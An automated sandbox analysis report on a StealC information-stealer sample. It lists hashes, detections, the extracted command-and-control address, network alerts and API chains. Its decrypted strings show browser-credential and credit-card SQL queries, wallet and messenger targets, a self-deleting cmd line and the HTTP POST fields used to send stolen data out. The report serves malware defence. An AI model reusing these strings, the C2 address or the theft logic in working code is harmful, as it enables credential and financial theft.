
Windows Analysis Report
stealcy11.exe

Overview

General Information

Sample name: stealcy11.exe
Analysis ID: 1579700
MD5: 004431fc72fc1228abf10e298efa0271
SHA1: 05195b1a70f078c9116998d7486e672d90e93218
SHA256: 082796fccb8ffb566a99ba188cae572eac30f1bf6e11a7bf4e5ebe757bc66c88
Tags: exe, StealC, user-lontze7

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • stealcy11.exe (PID: 7784 cmdline: "C:\Users\user\Desktop\stealcy11.exe" MD5: 004431FC72FC1228ABF10E298EFA0271)
    • WerFault.exe (PID: 8164 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 1384 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration: {"C2 url": "https:/135.181.65.216/ee45b7c5e4cb75cb.php"}
Yara rule JoeSecurity_Stealc (description: Yara detected Stealc; author: Joe Security) matched the following sources:

Submitted file:
  • stealcy11.exe

Memory dumps:
  • 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
  • 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmp
  • 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmp
  • 00000000.00000000.1341588473.000000000090B000.00000002.00000001.01000000.00000003.sdmp
  • 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmp

Unpacked PE files:
  • 0.2.stealcy11.exe.8e0000.0.unpack
  • 0.0.stealcy11.exe.8e0000.0.unpack

No Sigma rule has matched

Suricata IDS alert:
  Timestamp: 2024-12-23T07:58:48.693601+0100
  SID: 2028765
  Severity: 3
  Classtype: Unknown Traffic
  Source IP: 192.168.2.9
  Source Port: 49712
  Destination IP: 135.181.65.216
  Destination Port: 443
  Protocol: TCP

                  AV Detection

Source: stealcy11.exe; Avira: detected
Source: stealcy11.exe.7784.0.memstrmin; Malware Configuration Extractor: StealC {"C2 url": "https:/135.181.65.216/ee45b7c5e4cb75cb.php"}
Source: stealcy11.exe; ReversingLabs: Detection: 60%
Source: stealcy11.exe; Virustotal: Detection: 56%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: stealcy11.exe; Joe Sandbox ML: detected
String decryptor results for source 0.2.stealcy11.exe.8e0000.0.unpack (one decrypted string per line):
  INSERT_KEY_HERE
  01
  03
  20
  25
  GetProcAddress
  LoadLibraryA
  lstrcatA
  OpenEventA
  CreateEventA
  CloseHandle
  Sleep
  GetUserDefaultLangID
  VirtualAllocExNuma
  VirtualFree
  GetSystemInfo
  VirtualAlloc
  HeapAlloc
  GetComputerNameA
  lstrcpyA
  GetProcessHeap
  GetCurrentProcess
  lstrlenA
  ExitProcess
  GlobalMemoryStatusEx
  GetSystemTime
  SystemTimeToFileTime
  advapi32.dll
  gdi32.dll
  user32.dll
  crypt32.dll
  GetUserNameA
  CreateDCA
  GetDeviceCaps
  ReleaseDC
  CryptStringToBinaryA
  sscanf
  VMwareVMware
  HAL9TH
  JohnDoe
  DISPLAY
  %hu/%hu/%hu
  https://135.181.65.216
  /ee45b7c5e4cb75cb.php
  /4a21a126be249f0d/
  default
  GetEnvironmentVariableA
  GetFileAttributesA
  HeapFree
  GetFileSize
  GlobalSize
  CreateToolhelp32Snapshot
  IsWow64Process
  Process32Next
  GetLocalTime
  FreeLibrary
  GetTimeZoneInformation
  GetSystemPowerStatus
  GetVolumeInformationA
  GetWindowsDirectoryA
  Process32First
  GetLocaleInfoA
  GetUserDefaultLocaleName
  GetModuleFileNameA
  DeleteFileA
  FindNextFileA
  LocalFree
  FindClose
  SetEnvironmentVariableA
  LocalAlloc
  GetFileSizeEx
  ReadFile
  SetFilePointer
  WriteFile
  CreateFileA
  FindFirstFileA
  CopyFileA
  VirtualProtect
  GetLogicalProcessorInformationEx
  GetLastError
  lstrcpynA
  MultiByteToWideChar
  GlobalFree
  WideCharToMultiByte
  GlobalAlloc
  OpenProcess
  TerminateProcess
  GetCurrentProcessId
  gdiplus.dll
  ole32.dll
  bcrypt.dll
  wininet.dll
  shlwapi.dll
  shell32.dll
  rstrtmgr.dll
  CreateCompatibleBitmap
  SelectObject
  BitBlt
  DeleteObject
  CreateCompatibleDC
  GdipGetImageEncodersSize
  GdipGetImageEncoders
  GdipCreateBitmapFromHBITMAP
  GdiplusStartup
  GdiplusShutdown
  GdipSaveImageToStream
  GdipDisposeImage
  GdipFree
  GetHGlobalFromStream
  CreateStreamOnHGlobal
  CoUninitialize
  CoInitialize
  CoCreateInstance
  BCryptGenerateSymmetricKey
  BCryptCloseAlgorithmProvider
  BCryptDecrypt
  BCryptSetProperty
  BCryptDestroyKey
  BCryptOpenAlgorithmProvider
  GetWindowRect
  GetDesktopWindow
  GetDC
  CloseWindow
  wsprintfA
  EnumDisplayDevicesA
  GetKeyboardLayoutList
  CharToOemW
  wsprintfW
  RegQueryValueExA
  RegEnumKeyExA
  RegOpenKeyExA
  RegCloseKey
  RegEnumValueA
  CryptBinaryToStringA
  CryptUnprotectData
  SHGetFolderPathA
  ShellExecuteExA
  InternetOpenUrlA
  InternetConnectA
  InternetCloseHandle
  HttpSendRequestA
  HttpOpenRequestA
  InternetReadFile
  InternetCrackUrlA
  StrCmpCA
  StrStrA
  StrCmpCW
  PathMatchSpecA
  GetModuleFileNameExA
  RmStartSession
  RmRegisterResources
  RmGetList
  RmEndSession
  sqlite3_open
  sqlite3_prepare_v2
  sqlite3_step
  sqlite3_column_text
  sqlite3_finalize
  sqlite3_close
  sqlite3_column_bytes
  sqlite3_column_blob
  encrypted_key
  PATH
  C:\ProgramData\nss3.dll
  NSS_Init
  NSS_Shutdown
  PK11_GetInternalKeySlot
  PK11_FreeSlot
  PK11_Authenticate
  PK11SDR_Decrypt
  C:\ProgramData\
  SELECT origin_url, username_value, password_value FROM logins
  browser:
  profile:
  url:
  login:
  password:
  Opera
  OperaGX
  Network
  cookies
  .txt
  SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
  TRUE
  FALSE
  autofill
  history
  SELECT url FROM urls LIMIT 1000
  cc
  SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
  name:
  month:
  year:
  card:
  Cookies
  Login Data
  Web Data
  History
  logins.json
  formSubmitURL
  usernameField
  encryptedUsername
  encryptedPassword
  guid
  SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
  SELECT fieldname, value FROM moz_formhistory
  SELECT url FROM moz_places LIMIT 1000
  cookies.sqlite
  formhistory.sqlite
  places.sqlite
  plugins
  Local Extension Settings
  Sync Extension Settings
  IndexedDB
  Opera Stable
  Opera GX Stable
  CURRENT
  chrome-extension_
  _0.indexeddb.leveldb
  Local State
  profiles.ini
  chrome
  opera
  firefox
  wallets
  %08lX%04lX%lu
  SOFTWARE\Microsoft\Windows NT\CurrentVersion
  ProductName
  x32
  x64
  %d/%d/%d %d:%d:%d
  HARDWARE\DESCRIPTION\System\CentralProcessor\0
  SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
  DisplayName
  DisplayVersion
  Network Info:
  - IP: IP?
  - Country: ISO?
  System Summary:
  - HWID:
  - OS:
  - Architecture:
  - UserName:
  - Computer Name:
  - Local Time:
  - UTC:
  - Language:
  - Keyboards:
  - Laptop:
  - Running Path:
  - CPU:
  - Threads:
  - Cores:
  - RAM:
  - Display Resolution:
  - GPU:
  User Agents:
  Installed Apps:
  All Users:
  Current User:
  Process List:
  system_info.txt
  freebl3.dll
  mozglue.dll
  msvcp140.dll
  nss3.dll
  softokn3.dll
  vcruntime140.dll
  \Temp\
  .exe
  runas
  open
  /c start
  %DESKTOP%
  %APPDATA%
  %LOCALAPPDATA%
  %USERPROFILE%
  %DOCUMENTS%
  %PROGRAMFILES_86%
  %RECENT%
  *.lnk
  files
  \discord\
  \Local Storage\leveldb\CURRENT
  \Local Storage\leveldb
  \Telegram Desktop\
  key_datas
  D877F783D5D3EF8C*
  map*
  A7FDF864FBC10B77*
  A92DAA6EA6F891F2*
  F8806DD0C461824F*
  Telegram
  Tox
  *.tox
  *.ini
  Password
  Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
  Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
  Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
  Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
  Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
  oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
  00000001
  00000002
  00000003
  00000004
  \Outlook\accounts.txt
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Pidgin
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: \.purple\
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: accounts.xml
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: dQw4w9WgXcQ
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: token:
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Software\Valve\Steam
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: SteamPath
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: \config\
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: ssfn*
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: config.vdf
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: DialogConfig.vdf
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: libraryfolders.vdf
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: loginusers.vdf
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: \Steam\
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: sqlite3.dll
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: done
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: soft
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: \Discord\tokens.txt
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: https
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: POST
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: HTTP/1.1
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: Content-Disposition: form-data; name="
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: hwid
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: build
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: token
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: file_name
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: file
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: message
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                  Source: 0.2.stealcy11.exe.8e0000.0.unpackString decryptor: screenshot.jpg
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_008E4B80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,0_2_008E4B80
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_00904090 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00904090
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_008E7690 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_008E7690
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_008E6000 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,0_2_008E6000
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_008E9B80 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_008E9B80
                  Source: C:\Users\user\Desktop\stealcy11.exeCode function: 0_2_008E9BE0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_008E9BE0
                  Source: stealcy11.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: stealcy11.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

                  Networking

                  Source: Malware configuration extractor | URLs: https:/135.181.65.216/ee45b7c5e4cb75cb.php
                  Source: Joe Sandbox View | ASN Name: HETZNER-ASDE HETZNER-ASDE
                  Source: Network traffic | Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49712 -> 135.181.65.216:443
                  Source: unknown | TCP traffic detected without corresponding DNS query: 135.181.65.216
                  Source: C:\Users\user\Desktop\stealcy11.exe | Code function: 0_2_008E56C0 lstrcpy,lstrlenA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,memcpy,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, | 0_2_008E56C0
                  Source: Amcache.hve.6.dr | String found in binary or memory: http://upx.sf.net
                  Source: stealcy11.exe, 00000000.00000002.1847814103.00000000010BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://135.181.65.216
                  Source: stealcy11.exe, 00000000.00000002.1847814103.00000000010BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://135.181.65.216/
                  Source: stealcy11.exe, 00000000.00000002.1847814103.000000000110F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://135.181.65.216/W
                  Source: stealcy11.exe, 00000000.00000002.1847814103.000000000110F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://135.181.65.216/z
                  Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
                  Source: C:\Users\user\Desktop\stealcy11.exe | Code function: 0_2_008E97A0 memset,memset,lstrcatA,lstrcatA,lstrcatA,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlenA,wsprintfA,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop, | 0_2_008E97A0
                  Source: C:\Users\user\Desktop\stealcy11.exe | Code function: String function: 008E4980 appears 316 times
                  Source: C:\Users\user\Desktop\stealcy11.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 1384
                  Source: stealcy11.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: classification engine | Classification label: mal100.troj.evad.winEXE@2/5@0/1
                  Source: C:\Users\user\Desktop\stealcy11.exe | Code function: 0_2_009046C0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle, | 0_2_009046C0
                  Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7784
                  Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\0c254e9b-4ef5-48a0-bc2a-e3c304dc47dc
                  Source: stealcy11.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\stealcy11.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: stealcy11.exe | ReversingLabs: Detection: 60%
                  Source: stealcy11.exe | Virustotal: Detection: 56%
                  Source: unknown | Process created: C:\Users\user\Desktop\stealcy11.exe "C:\Users\user\Desktop\stealcy11.exe"
                  Source: C:\Users\user\Desktop\stealcy11.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 1384
                  Source: C:\Users\user\Desktop\stealcy11.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\stealcy11.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\Desktop\stealcy11.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\Desktop\stealcy11.exe | Section loaded: rstrtmgr.dll
                  Source: C:\Users\user\Desktop\stealcy11.exe | Section loaded: ncrypt.dll
                  Source: C:\Users\user\Desktop\stealcy11.exe | Section loaded: ntasn1.dll
                  Source: C:\Users\user\Desktop\stealcy11.exe | Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\stealcy11.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\stealcy11.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\Desktop\stealcy11.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\stealcy11.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\stealcy11.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\stealcy11.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\Desktop\stealcy11.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\stealcy11.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\stealcy11.exe | Section loaded: winnsi.dll
                  Source: C:\Users\user\Desktop\stealcy11.exe | Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\stealcy11.exe | Section loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\stealcy11.exe | Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\stealcy11.exe | Section loaded: schannel.dll
                  Source: C:\Users\user\Desktop\stealcy11.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                  Source: stealcy11.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\stealcy11.exe | Code function: 0_2_009063C0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_009063C0
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\stealcy11.exe | Evasive API call chain: GetSystemTime,DecisionNodes | graph_0-5657
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.6.dr | Binary or memory string: vmci.syshbin
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware, Inc.
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.6.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.6.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: stealcy11.exe, 00000000.00000002.1847814103.0000000001123000.00000004.00000020.00020000.00000000.sdmp, stealcy11.exe, 00000000.00000002.1847814103.00000000010BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: Amcache.hve.6.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.6.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.6.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.dr | Binary or memory string: vmci.sys
                  Source: Amcache.hve.6.dr | Binary or memory string: vmci.syshbin`
                  Source: Amcache.hve.6.dr | Binary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.6.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware20,1
                  Source: Amcache.hve.6.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.6.dr | Binary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: stealcy11.exe, 00000000.00000002.1847814103.00000000010BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                  Source: Amcache.hve.6.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.6.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.6.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.6.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.6.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\stealcy11.exe | API call chain: ExitProcess graph end node | graph_0-5436
                  Source: C:\Users\user\Desktop\stealcy11.exe | Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\stealcy11.exe | Process queried: DebugPort
                  Source: C:\Users\user\Desktop\stealcy11.exe | Code function: 0_2_008E5570 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,memcpy,InternetReadFile,LdrInitializeThunk,InternetCloseHandle,InternetCloseHandle, | 0_2_008E5570
                  Source: C:\Users\user\Desktop\stealcy11.exe | Code function: 0_2_008E4980 VirtualProtect 00000000,00000004,00000100,? | 0_2_008E4980
                  Source: C:\Users\user\Desktop\stealcy11.exe | Code function: 0_2_009063C0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_009063C0
                  Source: C:\Users\user\Desktop\stealcy11.exe | Code function: 0_2_009063C0 mov eax, dword ptr fs:[00000030h] | 0_2_009063C0
                  Source: C:\Users\user\Desktop\stealcy11.exe | Code function: 0_2_009028B0 GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,RegCloseKey, | 0_2_009028B0
                  Source: C:\Users\user\Desktop\stealcy11.exe | Memory protected: page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara match | File source: Process Memory Space: stealcy11.exe PID: 7784, type: MEMORYSTR
